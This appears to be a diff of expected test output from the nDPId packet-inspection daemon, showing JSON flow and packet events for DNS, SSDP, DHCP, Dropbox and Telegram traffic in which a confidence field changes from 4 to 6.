-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1588779650102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1588779650102,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM8zMAAEARoKnAqAFNVwvNw2326XwAOBQNt7NLZEiPyb9nJ25aFShQjjbK9tSAqF2RZJuCl4MIgiF4TeaDrkRovC99CpyADzRp"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1588779650651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1588779650651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABD6GYAAP8RT6TAqAFNwKgBAeT3ADUAL99XO7EBAAABAAAAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1588779650652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779650652,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHeaUAAP8RvmHAqAFNwKgBAcF9ADUAM+X9HKUBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1588779650666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779650666,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXLE1AADkRkarAqAEBwKgBTQA1wX0AQwAAHKWBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAcABFx69t8="} 
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} 
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1588779650681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1588779650681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABtxO5AADkR+PLAqAEBwKgBTQA15PcAWQAAO7GBgAABAAIAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAcAAOCXRlbGVtZXRyeQF2wBbAMwABAAEAAAA8AASifRMJ"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1588779650842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779650842,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaJ+EAAAER35rAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1588779652844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779652844,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACajVgAAAEReiPAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 